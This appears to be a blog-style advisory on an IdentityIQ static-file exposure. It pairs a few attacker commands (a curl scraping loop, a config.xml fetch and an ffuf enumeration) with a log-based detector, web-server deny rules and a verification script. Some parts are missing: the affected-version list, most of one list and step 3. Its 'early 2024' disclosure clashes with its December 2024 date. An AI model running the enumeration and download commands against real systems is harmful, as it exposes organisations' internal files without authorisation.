SailPoint IdentityIQ is widely used for managing identities, automating access, and enforcing compliance in big enterprises. But in early 2024, a major security flaw — CVE-2024-10905 — was made public. This vulnerability exposed static files inside the IdentityIQ application that were supposed to be protected. If you're running one of these versions:

then your sensitive files might be at risk.

Let's break it down — simply, with example exploit details, and clear steps to mitigate.

What is the Issue?

IdentityIQ's web application serves some *static content* (like JavaScript files, images, XML files, and internal documentation) from a web-accessible directory. These files can contain:

- Comments revealing hidden endpoints or configuration

These files are meant for internal use and are not supposed to be reachable from the public internet. Because of misconfigured HTTP access rules, however, attackers can download them without logging in.

Why does this matter?
These files often aid reconnaissance. Attackers hunting for exploits love to find internal docs, config files, or sample code left over from older versions.

How would an attacker find this?

Suppose your org hosts IdentityIQ at https://identity.example.com/identityiq. An attacker can just start browsing suspected static directory paths, like:

https://identity.example.com/identityiq/static/

or

https://identity.example.com/identityiq/WEB-INF/

or even deeper

https://identity.example.com/identityiq/js/
https://identity.example.com/identityiq/docs/

These aren’t the actual subfolders in every install, but they’re common in Java web apps. In the case of CVE-2024-10905, many instances allowed HTTP GETs to certain resource folders.

Here's how an attacker might quickly list and exfiltrate static files using curl and a shell loop:

# Example: downloading all '.js' and '.xml' files from a public static folder
for file in $(curl -s 'https://identity.example.com/identityiq/static/' | grep -oE 'href="[^"]+\.(js|xml)"' | cut -d'"' -f2); do
  curl -O "https://identity.example.com/identityiq/static/$file"
done

Or with just curl for a known file (say, someone found that config.xml leaks):

curl -O 'https://identity.example.com/identityiq/static/config.xml'

If directory listing is disabled, the attacker may use wordlists and tools like dirsearch or ffuf:

ffuf -u https://identity.example.com/identityiq/FUZZ -w common.txt

Even a simple browser and guesswork can reach items like:

- /identityiq/static/scripts.js
- /identityiq/static/help.html
- /identityiq/static/config.xml
- /identityiq/static/internal_api_documentation.html

What’s The Risk?

- Sensitive information leakage: Internal docs, hardcoded credentials, configurations, even internal API notes.

- Recon for further attacks: Exact product version, enabled features, undocumented functionality.

- Help for RCE or privilege escalation: Anyone chaining other bugs (e.g. deserialization, weak endpoints) will use this info.
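From the defender's side, both the direct downloads and the wordlist enumeration described above leave traces in the web server access log. The following is an added example (not code from the article or from SailPoint) that parses combined-format log lines, as written by an Apache or nginx reverse proxy in front of IdentityIQ, and raises two signals: a 2xx response for a path under one of the prefixes the article names (the file was actually served), and a burst of 404s from one client under the context root (the ffuf/dirsearch pattern). The prefix list and the sample log lines are constructed for the example; tune the prefixes to what your own instance serves.

```python
"""Access-log detection for CVE-2024-10905 style static-file exposure.

Added example, not code from the article or from SailPoint. It parses
combined-format lines (what an Apache or nginx reverse proxy in front of
IdentityIQ normally writes) and raises two signals:
  * a 2xx for a path under a protected prefix: the file was actually served
  * many 404s from one client in a short window: wordlist enumeration
    against the context root
The sample log lines below are constructed for the example.
"""
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Optional

# Prefixes the article names as exposed; adjust to your own deployment.
PROTECTED_PREFIXES = (
    "/identityiq/static/",
    "/identityiq/WEB-INF/",
    "/identityiq/js/",
    "/identityiq/docs/",
)

# Combined log format: ip ident user [ts] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample: one served config.xml, one enumeration burst, one blocked hit.
SAMPLE_LOG = """\
203.0.113.7 - - [02/Dec/2024:15:20:01 +0000] "GET /identityiq/login.jsf HTTP/1.1" 200 5123
203.0.113.7 - - [02/Dec/2024:15:20:03 +0000] "GET /identityiq/static/config.xml HTTP/1.1" 200 2210
198.51.100.9 - - [02/Dec/2024:15:21:00 +0000] "GET /identityiq/admin HTTP/1.1" 404 321
198.51.100.9 - - [02/Dec/2024:15:21:01 +0000] "GET /identityiq/backup HTTP/1.1" 404 321
198.51.100.9 - - [02/Dec/2024:15:21:01 +0000] "GET /identityiq/config HTTP/1.1" 404 321
198.51.100.9 - - [02/Dec/2024:15:21:02 +0000] "GET /identityiq/docs/ HTTP/1.1" 403 199
198.51.100.9 - - [02/Dec/2024:15:21:02 +0000] "GET /identityiq/test HTTP/1.1" 404 321
198.51.100.9 - - [02/Dec/2024:15:21:03 +0000] "GET /identityiq/old HTTP/1.1" 404 321
198.51.100.9 - - [02/Dec/2024:15:21:03 +0000] "GET /identityiq/WEB-INF/web.xml HTTP/1.1" 403 199
192.0.2.4 - - [02/Dec/2024:15:25:00 +0000] "GET /identityiq/static/scripts.js HTTP/1.1" 403 199
"""


def parse_line(line: str) -> Optional[dict]:
    """Parse one combined-format line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "path": m["path"].split("?", 1)[0],  # drop any query string
        "status": int(m["status"]),
    }


def find_served_protected(records: List[dict]) -> List[dict]:
    """Requests where a protected path was actually delivered (2xx)."""
    return [
        r for r in records
        if 200 <= r["status"] < 300 and r["path"].startswith(PROTECTED_PREFIXES)
    ]


def find_enumeration(records: List[dict], threshold: int = 5,
                     window_seconds: int = 60) -> Dict[str, int]:
    """Clients with >= threshold 404s under /identityiq/ inside a sliding window.

    Returns {ip: peak number of 404s seen within any single window}.
    """
    by_ip: Dict[str, list] = defaultdict(list)
    for r in records:
        if r["status"] == 404 and r["path"].startswith("/identityiq/"):
            by_ip[r["ip"]].append(r["ts"])
    flagged: Dict[str, int] = {}
    for ip, times in by_ip.items():
        times.sort()
        start, peak = 0, 0
        for end in range(len(times)):
            while (times[end] - times[start]).total_seconds() > window_seconds:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


def analyze(log_text: str, threshold: int = 5, window_seconds: int = 60) -> dict:
    """Run both detections over raw log text."""
    records = [r for r in map(parse_line, log_text.splitlines()) if r]
    return {
        "served_protected": find_served_protected(records),
        "enumeration": find_enumeration(records, threshold, window_seconds),
    }


if __name__ == "__main__":
    result = analyze(SAMPLE_LOG)
    for r in result["served_protected"]:
        print(f"SERVED  {r['ip']} {r['path']} -> {r['status']}")
    for ip, n in result["enumeration"].items():
        print(f"ENUM    {ip} {n} x 404 under /identityiq/")
```

On the constructed sample this reports the served `/identityiq/static/config.xml` from 203.0.113.7 and flags 198.51.100.9 for five 404s inside a few seconds; the blocked 403s from 192.0.2.4 are what a correctly patched instance should produce. The 404 threshold and window are deliberately parameters, because normal users also produce the occasional 404 and the right cut-off depends on your traffic.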

References

- CVE-2024-10905 at NVD
- SailPoint customer portal security bulletins
- SailPoint’s release note for 8.4p2
- General Java web app directory traversal 101

1. Upgrade Immediately

If you’re below 8.4p2 (or 8.3p5 or 8.2p8), patch ASAP. According to SailPoint, the patch restricts access to these static files.

2. Remove Unused Files

If you have legacy folders or test files inside the IdentityIQ root, move them elsewhere or delete them.

Example for Apache HTTP

# <Directory> matches a filesystem path, so this only applies when Apache serves
# the files itself; if Apache merely proxies to Tomcat, use a <Location> block instead.
<Directory "/opt/identityiq/static">
    # Apache 2.2 syntax (needs mod_access_compat on 2.4, where "Require all denied" is the native form)
    Order allow,deny
    Deny from all
</Directory>

Example for nginx

location /identityiq/static/ {
    deny all;
}

Example for Tomcat’s web.xml

<!-- url-pattern is relative to the context root, i.e. this covers /identityiq/static/*.
     An empty <auth-constraint/> would deny every caller, not just users outside the admin role. -->
<security-constraint>
  <web-resource-collection>
    <web-resource-name>Static Protected</web-resource-name>
    <url-pattern>/static/*</url-pattern>
  </web-resource-collection>
  <auth-constraint>
    <role-name>admin</role-name>
  </auth-constraint>
</security-constraint>

4. Scan Regularly

Use tools like Nikto or OWASP ZAP to scan for public static files.
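A scanner run is a point-in-time check; it is also worth having a small repeatable script that verifies, after each patch or configuration change, that the paths this article lists no longer answer an unauthenticated GET. The following is an added example (not SailPoint's code or a tool from the article) meant to be run against your own instance. The base URL is a placeholder, the path list is the article's, and the `fetch` parameter is injectable so the decision logic can be exercised without a live server.

```python
"""Post-remediation check that protected IdentityIQ paths no longer answer
unauthenticated GETs.

Added example, not SailPoint's code or a tool from the article. Point it at
your own instance after patching or adding the web-server/Tomcat rules; the
base URL below is a placeholder and the path list is the one the article gives.
"""
import sys
import urllib.error
import urllib.request
from typing import Callable, Dict

# Relative to the IdentityIQ context root; taken from the article's examples.
PROTECTED_PATHS = [
    "/static/",
    "/static/scripts.js",
    "/static/help.html",
    "/static/config.xml",
    "/static/internal_api_documentation.html",
    "/WEB-INF/",
    "/WEB-INF/web.xml",
    "/js/",
    "/docs/",
]


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Do not follow redirects: a 302 to the login page is itself the answer."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def http_status(url: str, timeout: float = 10.0) -> int:
    """HTTP status of an unauthenticated GET (no cookies, no credentials)."""
    opener = urllib.request.build_opener(_NoRedirect)
    req = urllib.request.Request(url, headers={"User-Agent": "static-exposure-check"})
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code  # 3xx (unfollowed), 4xx and 5xx all land here


def is_blocked(status: int) -> bool:
    """401/403/404 and any redirect (e.g. to the login page) count as blocked.

    Anything else (200, but also 5xx) is reported so a human can look at it.
    """
    return status in (401, 403, 404) or 300 <= status < 400


def check_exposure(base_url: str,
                   fetch: Callable[[str], int] = http_status) -> Dict[str, int]:
    """Return {path: status} for every protected path that is still reachable.

    `fetch` is injectable so the logic can be tested without a server.
    """
    root = base_url.rstrip("/")
    exposed: Dict[str, int] = {}
    for path in PROTECTED_PATHS:
        status = fetch(root + path)
        if not is_blocked(status):
            exposed[path] = status
    return exposed


if __name__ == "__main__":
    # Placeholder base URL; pass your own instance's context root as argv[1].
    base = sys.argv[1] if len(sys.argv) > 1 else "https://identity.example.com/identityiq"
    found = check_exposure(base)
    for path, status in found.items():
        print(f"STILL EXPOSED {status} {base.rstrip('/')}{path}")
    if found:
        sys.exit(1)
    print("all protected paths blocked")
```

Run it before and after applying the web-server or web.xml rules above: the "before" run documents the exposure, the "after" run should print that every path is blocked and exit 0. Redirects are not followed on purpose, since following a redirect to the login page would turn an expected block into a misleading 200.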

Final Thoughts

A bug like CVE-2024-10905 is the kind that an attacker lives for: easy to exploit, overlooked in default configs, loaded with information for more complex attacks down the road. Fixing it is simple: patch, block, and verify. If you’re on IdentityIQ, don’t ignore this — keep your org’s secrets out of public reach.


*Stay vigilant, patch often, and never assume "static" means "safe".*

If you’re a customer and need more info, consult the SailPoint official advisory or your vendor directly. Happy patching!

Timeline

Published on: 12/02/2024 15:15:10 UTC